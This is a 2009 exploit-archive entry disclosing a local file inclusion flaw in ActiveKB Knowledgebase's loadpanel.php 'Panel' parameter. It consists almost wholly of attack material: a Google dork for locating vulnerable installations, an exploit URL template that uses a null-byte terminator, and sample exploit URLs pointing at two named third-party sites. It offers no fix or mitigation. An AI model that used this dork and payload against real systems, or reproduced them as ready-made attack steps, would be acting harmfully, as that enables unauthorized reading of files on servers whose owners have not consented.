[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : ActiveKB Knowledgebase (loadpanel.php Panel) Local File Inclusion Vuln
# Published : 2009-04-03
# Author : Angela Chang
# Previous Title : iDB 0.2.5pa SVN 243 (skin) Local File Inclusion Exploit
# Next Title : glFusion <= 1.1.2 COM_applyFilter()/cookies Blind SQL Injection Exploit


[o]------------------------------------------------------------------------------------[x]
 |  Local File Inclusion Vulnerability                                                  |
[o]------------------------------------------------------------------------------------[o]
 |  Software : ActiveKB Knowledgebase version X.X                                       |
 |  Vendor    : http://www.interspire.com/activekb/                                     |
 |  Date         : 02 April 2009                                                        |
 |  Author     : Angela Chang                                                           |
 |  Contact   :  mizz_4ng3l@yahoo.com                                                   |
[o]------------------------------------------------------------------------------------[o]

[??] Google Dork

    "Powered by ActiveKB Knowledgebase Software"
    inurl:loadpanel.php?Panel=

[??] Vulnerable

    ./loadpanel.php

[??] Exploit

    http://[site]/[path]/loadpanel.php?Panel=[LFI]%00

[??] Sample

    http://help.theedweb.com/activekb/loadpanel.php?Panel=[LFI]%00
    http://my.myriadnetwork.com/kb//loadpanel.php?Panel=[LFI]%00

[o]------------------------------------------------------------------------------------[x]
 |  Greetz     :    Speciale Thanks FoR :                                               |
[o]------------------------------------------------------------------------------------[o]
 |    -------- Vrs-hCk , Nyubi (Solpot) , OoN_Boy      ----------                       |
[o]------------------------------------------------------------------------------------[o]

# www.Syue.com [2009-04-03]